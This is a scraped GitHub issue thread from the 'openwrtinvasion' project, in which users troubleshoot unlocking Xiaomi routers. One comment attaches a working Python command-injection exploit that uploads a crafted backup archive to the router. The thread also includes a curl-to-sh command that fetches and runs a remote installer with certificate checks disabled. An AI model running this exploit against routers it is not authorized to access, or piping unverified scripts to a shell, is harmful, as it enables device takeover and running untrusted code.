Comments (6)
Can’t help you, didn’t try to run it on Windows. If you manage to make it work please open a pull request. Otherwise, run it on Linux, which you can install in a virtual machine
from openwrtinvasion.
@ltg1710 if you're using VPN (for exmple l2tp) connection, please see #13
from openwrtinvasion.
I install in a virtual machine (ubuntu18),but I also got this error: {"code":1629,"msg":"解压失败,可能文件已经损坏"}
from openwrtinvasion.
@ltg1710 I want to know how you solved it in the end. I have the same situation with you using window WSL, so is it because the file format problem can only be used under MacOS
from openwrtinvasion.
Eventually I switched to a Linux computer and it worked. I don't know why, but it looks like Windows WSL won't work
from openwrtinvasion.
{"code":1629,"msg":"解压失败,可能文件已经损坏"}
I'm one of the first users of this method, but I only used the "telnet" method, without flashing OpenWrt firmware.
The "telnet" worked well until approximately May 1st, before I installed the Aria2 Ngrok on MIXBOX. Before the day, I only had ShadowSocks on MIXBOX, and it worked well.
Finding the "telnet" method in unaccessible, I reset the official firmware 2.28.62. But can't use "telnet" still. Then I started to look into the "remote_command_execution_vulnerability.py" and its dependencies, then made some debug prints, as is shown in attachment.
I personally think the reason for the first-broken-down is low ROM in 4A-Gibit. It can't install too many plugins. And a completely erase in memory may help, but I don't know how......
I really appreciate it if someone can help me restore "telnet".
First run on win 10. Bug appeared and tried ubuntu 20.04LTS, both failed with {"code":1629,"msg":"解压失败,可能文件已经损坏"}
Besides, I found it unnecessary to flash OpenWrt firmware if you only want the very SSR.
I installed MIXBOX on my 4A-Gibit using "telnet" command line
sh -c "$(curl -kfsSl https://monlor.coding.net/p/mbfiles/d/mbfiles/git/lfs/master/install.sh)" && source /etc/profile &> /dev/null
MIXBOX is really easy to handle, and most importantly, it will never get your router bricked.
Attachment:
remote_command_execution_vulnerability.py
#!/usr/bin/python
# There is a remote command execution vulnerability in Xiaomi Mi WiFi R3G before version stable 2.28.23.
# The backup file is in tar.gz format. After uploading, the application uses the tar zxf command to decompress,
# so you can control the contents of the files in the decompressed directory.
# In addition, the application's sh script for testing upload and download speeds will read the url list from /tmp/speedtest_urls.xml,
# and there is a command injection vulnerability.
# discoverer: UltramanGaia from Kap0k & Zhiniang Peng from Qihoo 360 Core Security
# HOW TO RUN
# Install requirements
# pip3 install -r requirements.txt
# Run the script
# python3 remote_command_execution_vulnerability.py
import os
import shutil
import tarfile
import requests
router_ip_address = input("Router IP address: ")
# router_ip_address = "192.168.0.21"
# get stok
stok = input("stok: ")
# stok = "eeb59f33a51cd46649cd4ad1e3f50ecf"
# From https://blog.securityevaluators.com/show-mi-the-vulns-exploiting-command-injection-in-mi-router-3-55c6bcb48f09
# In the attacking machine (macos), run the following before executing this script: /usr/bin/nc -l 4444
command="((sh /tmp/script.sh exploit) &)"
# proxies = {"http":"http://127.0.0.1:8080"}
proxies = {}
if os.path.exists("build"):
shutil.rmtree("build")
else:
print('no build')
os.makedirs("build")
## make config file
speed_test_filename = "speedtest_urls.xml"
with open("speedtest_urls_template.xml","rt",encoding='utf-8') as f:
template = f.read()
data = template.format(router_ip_address=router_ip_address, command=command)
print(data)
with open("build/speedtest_urls.xml",'wt',encoding='utf-8') as f:
f.write(data)
print('write')
# Make tar
with tarfile.open("build/payload.tar.gz", "w:gz",encoding='utf-8') as tar:
tar.add("build/speedtest_urls.xml", "speedtest_urls.xml")
tar.add("script.sh")
print('taring')
# tar.add("busybox")
# tar.add("extras/wget")
# tar.add("extras/xiaoqiang")
## upload config file
print("start uploading config file...")
r1 = requests.post("http://{}/cgi-bin/luci/;stok={}/api/misystem/c_upload".format(router_ip_address, stok), files={"image":open("build/payload.tar.gz",'rb')}, proxies=proxies)
print(r1.text)
# ## exec download speed test, exec command
# print("start exec command...")
# r2 = requests.get("http://{}/cgi-bin/luci/;stok={}/api/xqnetdetect/netspeed".format(router_ip_address, stok), proxies=proxies)
# # print(r2.text)
# print("done! Now you can connect to the router using telnet (user: root, password: none)")
# print("In MacOS, execute in the terminal:")
# print("telnet {}".format(router_ip_address))
from openwrtinvasion.
Related Issues (20)
- Hoddys Bricked video has malware-infested tools HOT 3
- Cyberduck vs SCP HOT 1
- Backup HOT 1
- where can i find the indian rom for this router? HOT 8
- Is there a way to downgrade from 2.30.500 rom
- 4C
- The green hand give up. Connection Refused. HOT 1
- Couldn't unzip, the file is corrupt on v3.2.13 - mi router 4c HOT 2
- cannot flash Mi Router 4A (non gigabit) | MiWiFi Release 3.0.10 HOT 2
- Cannot flash OpenWRT on Mi Router 4A 100M (Chinese version) firmware 2.28.62 HOT 1
- Doesn't work on the Mi Router 4A(gigabit) (Chinese version) which is using latest firmware(2.30.28) HOT 1
- MI Router 4A (Gigabytes) Version 2.30.500 is not supported HOT 3
- Xiaomi Router 3 Pro (R3P)
- stock after flash HOT 1
- Feature: Mark {"code":1629,"msg":"Unpacking failed. The file may be damaged"} as expected error HOT 2
- Download instead of clone
- Sharing my experience on success invasion
- Warning: the process has finished, but seems like ssh connection to the router is not working as expected. HOT 6
- Successful invasion on 4c 3.0.45 HOT 2
- ROM file replacement
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from openwrtinvasion.